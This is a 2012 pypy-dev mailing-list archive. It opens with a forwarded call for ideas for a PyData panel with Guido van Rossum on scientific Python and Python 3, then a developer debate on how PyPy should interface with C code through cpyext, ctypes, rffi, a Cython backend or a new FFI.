
I will take the liberty to forward this topic on "scientific python" to the pypy list, since numpy work on pypy has apparently progressed a lot, and it does concern pypy too, I guess..

Date: Mon, 13 Feb 2012 13:55:45 -0800 From: Fernando Perez Subject: [Matplotlib-users] Discussion with Guido van Rossum and (hopefully) core python-dev on scientific Python and Python3 To: Discussion of Numerical Python Cc: sage-devel, cython-users, SciPy Users List, networkx-discuss, enthought-dev, SciPy Developers List, Core developer mailing list of the Cython compiler, matplotlib development list, IPython Development list, IPython User list, pystatsmodels at googlegroups.com, Matplotlib Users Message-ID:
Content-Type: text/plain; charset=ISO-8859-1

Hi folks, [ I'm broadcasting this widely for maximum reach, but I'd appreciate it if replies can be kept to the *numpy* list, which is sort of the 'base' list for scientific/numerical work. It will make it much easier to organize a coherent set of notes later on. Apologies if you're subscribed to all and get it 10 times. ]

As part of the PyData workshop (http://pydataworkshop.eventbrite.com) to be held March 2 and 3 at the Mountain View Google offices, we have scheduled a session for an open discussion with Guido van Rossum and hopefully as many core python-dev members as can make it. We wanted to seize the combined opportunity of the PyData workshop bringing a number of 'scipy people' to Google with the timeline for Python 3.3, the first release after the Python language moratorium, being within sight: http://www.python.org/dev/peps/pep-0398.

While a number of scientific Python packages are already available for Python 3 (either in released form or in their master git branches), it's fair to say that there hasn't been a major transition of the scientific community to Python3. Since there is no more development being done on the Python2 series, eventually we will all want to find ways to make this transition, and we think that this is an excellent time to engage the core python development team and consider ideas that would make Python3 generally a more appealing language for scientific work. Guido has made it clear that he doesn't speak for the day-to-day development of Python anymore, so we all should be aware that any ideas that come out of this panel will still need to be discussed with python-dev itself via standard mechanisms before anything is implemented. Nonetheless, the opportunity for a solid face-to-face dialog for brainstorming was too good to pass up. The purpose of this email is then to solicit, from all of our community, ideas for this discussion.
In a week or so we'll need to summarize the main points brought up here and make a more concrete agenda out of it; I will also post a summary of the meeting afterwards here. Anything is a valid topic; some points just to get the conversation started:

- Extra operators/PEP 225. Here's a summary from the last time we went over this, years ago at Scipy 2008: http://mail.scipy.org/pipermail/numpy-discussion/2008-October/038234.html, and the current status of the document we wrote about it is here: file:///home/fperez/www/site/_build/html/py4science/numpy-pep225/numpy-pep225.html.

- Improved syntax/support for rationals or decimal literals? While Python now has both decimals (http://docs.python.org/library/decimal.html) and rationals (http://docs.python.org/library/fractions.html), they're quite clunky to use because they require full constructor calls. Guido has mentioned in previous discussions toying with ideas about support for different kinds of numeric literals...

- Using the numpy docstring standard python-wide, and thus having python improve the pathetic state of the stdlib's docstrings? This is an area where our community is light years ahead of the standard library, but we'd all benefit from Python itself improving on this front. I'm toying with the idea of giving a lightning talk at PyCon about this, comparing the great, robust culture and tools of good docstrings across the Scipy ecosystem with the sad, sad state of docstrings in the stdlib. It might spur some movement on that front from the stdlib authors, esp. if the core python-dev team realizes the value and benefit it can bring (at relatively low cost, given how most of the information does exist, it's just in the wrong places).
But more importantly for us, if there was truly a universal standard for high-quality docstrings across Python projects, building good documentation/help machinery would be a lot easier, as we'd know what to expect and search for (such as rendering them nicely in the ipython notebook, providing high-quality cross-project help search, etc).

- Literal syntax for arrays? Sage has been floating a discussion about a literal matrix syntax (https://groups.google.com/forum/#!topic/sage-devel/mzwepqZBHnA). For something like this to go into python in any meaningful way there would have to be core multidimensional arrays in the language, but perhaps it's time to think about moving a piece of the numpy array itself into Python? This is one of the more 'out there' ideas, but after all, that's the point of a discussion like this, especially considering we'll have both Travis and Guido in one room.

- Other syntactic sugar? Sage has "a..b" <=> range(a, b+1), which I actually think is both nice and useful... There's also the question of allowing "a:b:c" notation outside of [], which has come up a few times in conversation over the last few years. Others?

- The packaging quagmire? This continues to be a problem, though python3 does have new improvements to distutils. I'm not really up to speed on the situation, to be frank. If we want to bring this up, someone will have to provide a solid reference or volunteer to do it in person.

- etc...

I'm putting the above just to *start* the discussion, but the real point is for the rest of the community to contribute ideas, so don't be shy. Final note: while I am here committing to organizing and presenting this at the discussion with Guido (as well as contacting python-dev), I would greatly appreciate help with the task of summarizing this prior to the meeting, as I'm pretty badly swamped in the run-in to pydata/pycon.
So if anyone is willing to help draft the summary as the date draws closer (we can put it up on a github wiki, gist, whatever), I will be very grateful. I'm sure it will be better than what I'll otherwise do the last night at 2am :)

Cheers, f

ps - to the obvious question about webcasting the discussion live for remote participation: yes, we looked into it already; no, unfortunately it appears it won't be possible. We'll try to at least have the audio recorded (and possibly video) for posting later on.

pps - if you are close to Mountain View and are interested in attending this panel in person, drop me a line at fernando.perez at berkeley.edu. We have a few spots available *for this discussion only* on top of the pydata regular attendance (which is long closed, I'm afraid). But we'll need to provide Google with a list of those attendees in advance. Please indicate if you are a core python committer in your email, as we'll give priority for this overflow pool to core python developers (but will otherwise accommodate as many people as Google lets us).

From wlavrijsen at lbl.gov Tue Feb 14 16:54:53 2012 From: wlavrijsen at lbl.gov (wlavrijsen at lbl.gov) Date: Tue, 14 Feb 2012 07:54:53 -0800 (PST) Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

Hi, On Tue, 14 Feb 2012, mark florisson wrote: > 1) C++ support > (http://docs.cython.org/src/userguide/wrapping_CPlusPlus.html) [.. snip ..] > Under this model I think the first three points are particularly > tough. Could RPython in any way alleviate the countless problems with > this approach (and how?), and would it allow the flexibility to > implement these features, or part of them?

For the first, the bulk is there (or at least to an extent that exceeds what is described in the above link; C++ is a large language ... ) in the cppyy module (reflex-support branch).
The C++ description info need not come from reflex (the medium-term goal is to have it come from LLVM IR), and could be filled in from yet another source, e.g. by something that is generated from cython. All representation of C++ objects as well as dispatching is in rpython code; only the access to the C++ description comes from a C api. Not saying that it is what you're looking for, nor disagreeing that it is "particularly tough" (it's taking a long time, after all). But it's there and it works, proving that it can be done.

Best regards, Wim -- WLavrijsen at lbl.gov -- +1 (510) 486 6411 -- www.lavrijsen.net

From arigo at tunes.org Tue Feb 14 17:01:35 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 17:01:35 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

Hi Mark, On Tue, Feb 14, 2012 at 16:22, mark florisson wrote: > (...) Going the python + ctypes way through to the end, > and supporting all the features, will be a lot of work. (...)

I think that your points are valid and need to be carefully considered. I was taking a bit of an extreme opposite stance here for the purpose of explaining the pros and cons that I see. I have no definite answer to any of these good questions. I think that it's going to be a lot of work anyway. And also, more importantly, it seems to me from the discussions here that the people involved (including me) are ready to talk but not to code, so well. In the end it's up to someone with real motivation to choose the approach he likes best and implement it.

A bientôt, Armin.
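The "C function with a known interface, callable through ctypes" idea raised earlier in the thread can likewise be sketched with plain ctypes; here libm's cos() stands in for the generated proxy (hypothetical --- a real Cython backend would emit and compile its own extern "C" wrapper):

```python
import ctypes
import ctypes.util

# Load a shared library; libm's cos() stands in here for a
# hypothetical generated proxy function with C linkage.
libm = ctypes.CDLL(ctypes.util.find_library("m"))

# Declare the interface the compiler would know statically.
libm.cos.argtypes = [ctypes.c_double]
libm.cos.restype = ctypes.c_double

print(libm.cos(0.0))  # 1.0
```

Note that functions called through CDLL (as opposed to PyDLL) already release the GIL for the duration of the call, which is the coarse-grained "ctypes GIL-releasing call" mentioned under point (3) of the earlier message.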
From fijall at gmail.com Tue Feb 14 17:04:29 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 18:04:29 +0200 Subject: [pypy-dev] Fwd: Discussion with Guido van Rossum and (hopefully) core python-dev on scientific Python and Python3 In-Reply-To: References: Message-ID: On Tue, Feb 14, 2012 at 5:35 PM, Serhat Sevki Dincer wrote: > I will take the liberty to forward this topic on "scientific python" > to pypy list, since numpy work on pypy has progressed a lot, > apparently, and it does concern pypy too, i guess.. Note - I know I'm replying to pypy-dev instead of numpy dev on purpose. We as in PyPy are not very interested in the language design decisions. In fact it's in our opinion much better to leave the language decisions to someone else and we'll continue to just improve performance and other aspects that are language-unrelated. In fact this is what got pypy to the place where it is right now - compatibility was a major issue from day 1. The same applies to numpy - we're committed to making numpy exactly the same as the original numpy in terms of API without really changing it, hence we're not that interested in participating in the discussion. That said, the only thing we really dislike about language decisions are changing syntax/semantics to improve performance. We believe readability should never be sacrificed in favor of performance, but this is roughly it. We'll happily let other people decide what's the best syntax for numpy. Cheers, fijal From faassen at startifact.com Tue Feb 14 17:04:56 2012 From: faassen at startifact.com (Martijn Faassen) Date: Tue, 14 Feb 2012 17:04:56 +0100 Subject: [pypy-dev] offtopic, ontopic, ... 
In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3A608F.80000@gmail.com> Message-ID: Hey, On Tue, Feb 14, 2012 at 4:28 PM, mark florisson wrote: [snip] >> There is no way to map that to Python unless you use something like >> ctypes (but ctypes is not considered to be right for this purpose). > > Why is ctypes not right? Cython could actually generate a C function > with a known interface, that proxies the actual C function. That code > would be compiled by the C compiler, and any C API changes would > prevent the module from compiling. It would also take care of any > promotions etc on the C level. I don't know but this was what people said. I'm hoping someone will explain why a new FFI story would be needed. Regards, Martijn From daid303 at gmail.com Tue Feb 14 17:17:46 2012 From: daid303 at gmail.com (Daid) Date: Tue, 14 Feb 2012 17:17:46 +0100 Subject: [pypy-dev] error In-Reply-To: References: Message-ID: Hi, Ok. In that case, to reproduce, you'll need the "STL" file from Frans. And his ".skeinforge_pypy" folder from C:\documents and settings/[USER]/ (this contains all the configuration settings, cross platform compatible, needs to be in $HOME) And the SkeinPyPy release from github. If I encounter an error like that again I'll see if I can make a nice reproducible package for you guys. On Tue, Feb 14, 2012 at 3:49 PM, Armin Rigo wrote: > Hi, > > Frans answered with more details but in a private mail to me. I > copied it to the following bug report: > > https://bugs.pypy.org/issue1045 > > This is really a pypy bug, because it should not be possible to get a > "RPython error: AssertionError". It shows that an assert in the PyPy > source code triggered (in the JIT optimizer, based on the file names). > > But of course it might be hard to reproduce without all the information. > > > A bient?t, > > Armin. > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: From stefan_ml at behnel.de Tue Feb 14 18:24:44 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 18:24:44 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Armin Rigo, 14.02.2012 16:12: > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >> interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point. Obviously ctypes works > in PyPy, and not, I believe, in a particularly "lucky" way at all. It > works by not being written as C code at all, but as (Python and) > RPython code. The difference of levels between C and RPython is > essential in PyPy. I just gave tons of examples of why it is so. I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. Regardless of what you (or I) think, software is being written that way while we speak. A lot of software. I mean, seriously, software is being written in Cobol and Java while we speak. That "most flexible way" has little to do with reality. There is no such thing as "one ring to bind them all". Except, perhaps, C. > You may not agree with > that, and you're free too; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it. It sounds like the JVM approach to me, though. Tons of great software has been dumped and rewritten during the last 16 years in order to get something (anything, really) that runs on top of the JVM. Let's not require PyPy users to take the same road. Even the .NET approach is smarter here. 
> Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. Don't come complaining "it's slow", though. It *is* > going to be slow.

My personal take on this is: if PyPy can't come up with a fast way to interface with C code, it's bound to die. Certainly not right away, maybe it'll find a niche somewhere to survive. Some applications simply don't have native dependencies, at least not in the beginning. If it's really lucky, there'll be enough people who rewrite their software and it may still take the JVM path. But if it doesn't, well ... Stefan

From romain.py at gmail.com Tue Feb 14 18:41:30 2012 From: romain.py at gmail.com (Romain Guillebert) Date: Tue, 14 Feb 2012 18:41:30 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <20120214174130.GA6782@hardshooter>

Hi everyone, Having worked on the Python backend for Cython, I can give you what I think are the main hassles. First, ctypes semantics don't match Cython semantics (which is way closer, in a good way, to C). Second, if you work with the AST, you have to reimplement stuff that doesn't change between Cython and Python + ctypes (i.e. the syntax of a lambda function, ...); this is not really hard to do but takes a lot of time and is not very rewarding. However, I think it's the right approach considering PyPy's design. I hope it helped. Thanks, Romain

On Tue, Feb 14, 2012 at 04:12:16PM +0100, Armin Rigo wrote: > Hi Stefan, > > On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: > > Hmm, if that is so, how would you ever want to make PyPy bidirectionally > > interface with anything at all? How does ctypes even work in PyPy? > > I believe you are not understanding my point.
Obviously ctypes works > in PyPy, and not, I believe, in a particularly "lucky" way at all. It > works by not being written as C code at all, but as (Python and) > RPython code. The difference of levels between C and RPython is > essential in PyPy. I just gave tons of examples of why it is so. I > know it's not a perfect solution for everybody; but we think that > writing C code (or generating it straight from something else) is not > the most flexible way to develop software. You may not agree with > that, and you're free to; but consider that we would be unlikely to > have a JIT in PyPy at all without the approach we took, so we think > there is some merit in it. > > Note that I'm pushing so much for a Cython that would emit Python code > instead of C --- but that's mostly for performance reasons on top of > PyPy. The alternative, which is quicker and only slightly more > hackish, is to complete the C API of cpyext in PyPy until it works > well enough. Don't come complaining "it's slow", though. It *is* > going to be slow. > > > A bientôt, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev

From fijall at gmail.com Tue Feb 14 18:42:16 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 19:42:16 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

On Tue, Feb 14, 2012 at 7:24 PM, Stefan Behnel wrote: > Armin Rigo, 14.02.2012 16:12: >> On Tue, Feb 14, 2012 at 14:12, Stefan Behnel wrote: >>> Hmm, if that is so, how would you ever want to make PyPy bidirectionally >>> interface with anything at all? How does ctypes even work in PyPy? >> >> I believe you are not understanding my point. Obviously ctypes works >> in PyPy, and not, I believe, in a particularly "lucky" way at all.
It >> works by not being written as C code at all, but as (Python and) >> RPython code. The difference of levels between C and RPython is >> essential in PyPy. I just gave tons of examples of why it is so. I >> know it's not a perfect solution for everybody; but we think that >> writing C code (or generating it straight from something else) is not >> the most flexible way to develop software. > > Regardless of what you (or I) think, software is being written that way > while we speak. A lot of software. > > I mean, seriously, software is being written in Cobol and Java while we > speak. That "most flexible way" has little to do with reality. There is no > such thing as "one ring to bind them all". Except, perhaps, C. > > >> You may not agree with >> that, and you're free to; but consider that we would be unlikely to >> have a JIT in PyPy at all without the approach we took, so we think >> there is some merit in it. > > It sounds like the JVM approach to me, though. Tons of great software has > been dumped and rewritten during the last 16 years in order to get > something (anything, really) that runs on top of the JVM. Let's not require > PyPy users to take the same road. Even the .NET approach is smarter here. > > >> Note that I'm pushing so much for a Cython that would emit Python code >> instead of C --- but that's mostly for performance reasons on top of >> PyPy. The alternative, which is quicker and only slightly more >> hackish, is to complete the C API of cpyext in PyPy until it works >> well enough. Don't come complaining "it's slow", though. It *is* >> going to be slow. > > My personal take on this is: if PyPy can't come up with a fast way to > interface with C code, it's bound to die. Certainly not right away, maybe > it'll find a niche somewhere to survive. Some applications simply don't > have native dependencies, at least not in the beginning.
If it's really > lucky, there'll be enough people who rewrite their software and it may > still take the JVM path. But if it doesn't, well ... > > Stefan

Stefan, you're completely missing Armin's point. PyPy has a good way to interface with C. You can call C from RPython using rffi and you can use ctypes. Both are not ideal, for different reasons, but we're addressing both of them in the mid-term, and we understand the need to interface with C. What we *don't* buy is that interfacing with C, efficiently and conveniently, requires you to have a stable C API that exposes objects. Even more, we don't buy that the CPython C API is the best choice here, even if you decide to have a C API. Instead we want to provide a decent and performant FFI, or a way to write modules in RPython. That's why we consider the CPython C API mostly a legacy thing and not our way forward. Cheers, fijal

From amauryfa at gmail.com Tue Feb 14 18:45:01 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Tue, 14 Feb 2012 18:45:01 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

2012/2/14 Stefan Behnel > if PyPy can't come up with a fast way to > interface with C code, it's bound to die. > But it certainly can! For example, PyPy implements the _ssl and pyexpat modules, which are interfaces to the openssl and expat libraries. And it does that by generating C code that calls the corresponding functions. See for example the code for SSLObject.write(): https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 it calls the C function SSL_write(), which is declared like this: https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 This kind of code is not difficult to write (in this case, it's a simple translation of CPython modules) and is close enough to C when you really need it.
For example, it's possible to use macros when they look like function calls, or embed C snippets. A C API is not the only way to interface with C libraries. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL:

From arigo at tunes.org Tue Feb 14 18:49:51 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 14 Feb 2012 18:49:51 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

Hi Stefan, On Tue, Feb 14, 2012 at 18:24, Stefan Behnel wrote: > My personal take on this is: if PyPy can't come up with a fast way to > interface with C code, it's bound to die. (...)

I think you are seeing the world through the pinhole of what would be needed for Cython's C files to compile nicely with PyPy. While I don't completely disagree with you, I do believe that there are other worthwhile options, as Fijal and Amaury just said --- and I also believe that there is incredibly more to PyPy than just that issue.

A bientôt, Armin.

From stefan_ml at behnel.de Tue Feb 14 18:56:44 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 18:56:44 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID:

Amaury Forgeot d'Arc, 14.02.2012 18:45: > 2012/2/14 Stefan Behnel >> if PyPy can't come up with a fast way to >> interface with C code, it's bound to die. > > But it certainly can! For example PyPy implements the _ssl and pyexpat > modules, > which are interfaces to the openssl and expat libraries. > And it does that by generating C code that calls the corresponding > functions.
> > See for example the code for SSLObject.write(): > https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 > it calls the C function SSL_write(), which is declared like this: > https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 > This kind of code is not difficult to write (in this case, it's a simple > translation of > CPython modules) and is close enough to C when you really need it. > For example, it's possible to use macros when they look like function calls, > or embed C snippets. Ok, then I take it that this would be the preferred Python+FFI approach for interfacing, right? ctypes is out of the loop? Stefan From fijall at gmail.com Tue Feb 14 19:00:20 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 20:00:20 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: > Amaury Forgeot d'Arc, 14.02.2012 18:45: >> 2012/2/14 Stefan Behnel >>> if PyPy can't come up with a fast way to >>> interface with C code, it's bound to die. >> >> But it certainly can! For example PyPy implements the _ssl and pyexpat >> modules, >> which are interfaces to the openssl and expat libraries. >> And it does that by generating C code that calls the corresponding >> functions. >> >> See for example the code for SSLObject.write(): >> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >> it calls the C function SSL_write(), which is declared like this: >> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >> This kind of code is not difficult to write (in this case, it's a simple >> translation of >> CPython modules) and is close enough to C when you really need it. >> For example, it's possible to use macros when they look like function calls, >> or embed C snippets. 
> > Ok, then I take it that this would be the preferred Python+FFI approach for > interfacing, right? ctypes is out of the loop? > > Stefan Ideally it would be a better FFI than ctypes in my opinion. Cheers, fijal From markflorisson88 at gmail.com Tue Feb 14 19:05:00 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 18:05:00 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On 14 February 2012 18:00, Maciej Fijalkowski wrote: > On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>> 2012/2/14 Stefan Behnel >>>> if PyPy can't come up with a fast way to >>>> interface with C code, it's bound to die. >>> >>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>> modules, >>> which are interfaces to the openssl and expat libraries. >>> And it does that by generating C code that calls the corresponding >>> functions. >>> >>> See for example the code for SSLObject.write(): >>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>> it calls the C function SSL_write(), which is declared like this: >>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>> This kind of code is not difficult to write (in this case, it's a simple >>> translation of >>> CPython modules) and is close enough to C when you really need it. >>> For example, it's possible to use macros when they look like function calls, >>> or embed C snippets. >> >> Ok, then I take it that this would be the preferred Python+FFI approach for >> interfacing, right? ctypes is out of the loop? >> >> Stefan > > Ideally it would be a better FFI than ctypes in my opinion. 
> > Cheers, > fijal > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev The issue is not really whether PyPy can interface with C; it obviously can. The problem is really to do it the other way around. Cython is just one example that wants to do it the other way around, but only because it currently works that way. It would be great if we would only ever go from Python into C libraries and back again, but Python and C stacks can be interwoven arbitrarily through callbacks (or directly by the library itself), which are not uncommon at all in Cython. I think if RPython were targeted (which sounds like a good idea), then there would still need to be some mechanisms to go back from those C libraries into PyPy land. It wouldn't need a large C API, but some minimalistic functionality would need to be there, which I'm sure could be supported by various different backends (think of things like PyGILState_Ensure() and PyObject_Call()). I think the FFI itself is a mere convenience. From anto.cuni at gmail.com Tue Feb 14 19:10:11 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Tue, 14 Feb 2012 19:10:11 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: <4F3AA383.2010001@gmail.com> On 02/14/2012 06:56 PM, Stefan Behnel wrote: > Ok, then I take it that this would be the preferred Python+FFI approach for > interfacing, right? ctypes is out of the loop? note that there are at least two different levels to interface with C code. The first is using rffi, which lets you call C code from RPython. Calls to rffi functions are translated into C calls at translation time. Then, there is the ctypes-like approach, which lets you call C from applevel code, which is basically a layer on top of libffi. The ctypes approach has some pretty important advantages, e.g.
you don't need a compiler, people don't need to learn another language, the development is faster, etc. On the other hand, I think that most of us agree that the ctypes interface is terrible. What I would like is an ffi module which is applevel but with a much nicer interface. And, the JIT compiler can turn these calls into very efficient machine code. We do need both alternatives in PyPy, if anything because ctypes or this yet-to-come "ffi" module needs to be implemented in RPython and thus depends on rffi. However, once it's ready the ffi module should ideally be powerful enough to interface with all the C code out there. ciao, Anto From stefan_ml at behnel.de Tue Feb 14 19:13:17 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 19:13:17 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Maciej Fijalkowski, 14.02.2012 19:00: > On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>> 2012/2/14 Stefan Behnel >>>> if PyPy can't come up with a fast way to >>>> interface with C code, it's bound to die. >>> >>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>> modules, >>> which are interfaces to the openssl and expat libraries. >>> And it does that by generating C code that calls the corresponding >>> functions. >>> >>> See for example the code for SSLObject.write(): >>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>> it calls the C function SSL_write(), which is declared like this: >>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>> This kind of code is not difficult to write (in this case, it's a simple >>> translation of >>> CPython modules) and is close enough to C when you really need it. >>> For example, it's possible to use macros when they look like function calls,
>> >> Ok, then I take it that this would be the preferred Python+FFI approach for >> interfacing, right? ctypes is out of the loop? > > Ideally it would be a better FFI than ctypes in my opinion. Erm, what do you mean by "ideally"? Would you not consider rffi usable or ready enough for being used for this? Do you mean there should be yet another FFI? Simple questions: Is rffi usable in this context or is it not? Does it require RPython code to be generated or does it also work with Python code? How do callbacks work in rffi? Does rffi provide access to PyPy objects? And how so? I don't know all that much about RPython. Would it work to generate RPython from Cython? Is there a transformation to map regular Python code down to RPython? (e.g. by renaming variables, templating, specialising, etc.) Stefan From markflorisson88 at gmail.com Tue Feb 14 19:17:13 2012 From: markflorisson88 at gmail.com (mark florisson) Date: Tue, 14 Feb 2012 18:17:13 +0000 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: <4F3AA383.2010001@gmail.com> References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> <4F3AA383.2010001@gmail.com> Message-ID: On 14 February 2012 18:10, Antonio Cuni wrote: > On 02/14/2012 06:56 PM, Stefan Behnel wrote: >> >> Ok, then I take it that this would be the preferred Python+FFI approach >> for >> interfacing, right? ctypes is out of the loop? > > > note that there are at least two different levels to interface with C code. > > The first is using rffi, which lets you to call C code from RPython. Calls > to rffi functions are translated into C calls at translation time. > > Then, there is the ctypes-like approach, which lets you to call C from > applevel code, which is basically a layer on top of libffi. > The ctypes approach has some pretty important advantages, e.g. you don't > need a compiler, people don't need to learn another language, the > development is faster, etc. In general, that's nice. 
For Cython that wouldn't really matter, it is compiling anyway, might as well add another pass :) > On the other hand, I think that most of us agree that the ctypes interface > is terrible. What I would like is an ffi module which is applevel but with a > much nicer interface. And, the JIT compiler can turn these calls into very > efficient machine code. > > We do need both alternatives in PyPy, if anything because ctypes or this > yet-to-come "ffi" module need to be implemented in RPython and thus depends > on rffi. > However, once it's ready the ffi module should ideally be powerful enough to > interface with all the C code out there. > > ciao, > Anto From stefan_ml at behnel.de Tue Feb 14 19:41:32 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Tue, 14 Feb 2012 19:41:32 +0100 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: Stefan Behnel, 14.02.2012 19:13: > Simple questions: > > Is rffi usable in this context or is it not? Does it require RPython code > to be generated or does it also work with Python code? How do callbacks > work in rffi? Does rffi provide access to PyPy objects? And how so? > > I don't know all that much about RPython. Would it work to generate RPython > from Cython? Is there a transformation to map regular Python code down to > RPython? (e.g. by renaming variables, templating, specialising, etc.) And, in case it turns out to be too involved to answer these questions on the mailing list, I may be able to join in for the sprint in Leipzig (in case it's still planned for June), at least for a Friday or Saturday. Would that make sense? That's still pretty far from now, but from the current discussion, I have my doubts that there will be a major breakthrough before that.
Stefan From fijall at gmail.com Tue Feb 14 19:46:28 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Tue, 14 Feb 2012 20:46:28 +0200 Subject: [pypy-dev] offtopic, ontopic, ... In-Reply-To: References: <4F399708.2070608@gmail.com> <4F3A1CD8.4040606@gmail.com> <4F3A2DDA.107@gmail.com> Message-ID: On Tue, Feb 14, 2012 at 8:13 PM, Stefan Behnel wrote: > Maciej Fijalkowski, 14.02.2012 19:00: >> On Tue, Feb 14, 2012 at 7:56 PM, Stefan Behnel wrote: >>> Amaury Forgeot d'Arc, 14.02.2012 18:45: >>>> 2012/2/14 Stefan Behnel >>>>> if PyPy can't come up with a fast way to >>>>> interface with C code, it's bound to die. >>>> >>>> But it certainly can! For example PyPy implements the _ssl and pyexpat >>>> modules, >>>> which are interfaces to the openssl and expat libraries. >>>> And it does that by generating C code that calls the corresponding >>>> functions. >>>> >>>> See for example the code for SSLObject.write(): >>>> https://bitbucket.org/pypy/pypy/src/default/pypy/module/_ssl/interp_ssl.py#cl-157 >>>> it calls the C function SSL_write(), which is declared like this: >>>> https://bitbucket.org/pypy/pypy/src/default/pypy/rlib/ropenssl.py#cl-255 >>>> This kind of code is not difficult to write (in this case, it's a simple >>>> translation of >>>> CPython modules) and is close enough to C when you really need it. >>>> For example, it's possible to use macros when they look like function calls, >>>> or embed C snippets. >>> >>> Ok, then I take it that this would be the preferred Python+FFI approach for >>> interfacing, right? ctypes is out of the loop? >> >> Ideally it would be a better FFI than ctypes in my opinion. > > Erm, what do you mean by "ideally"? Would you not consider rffi usable or > ready enough 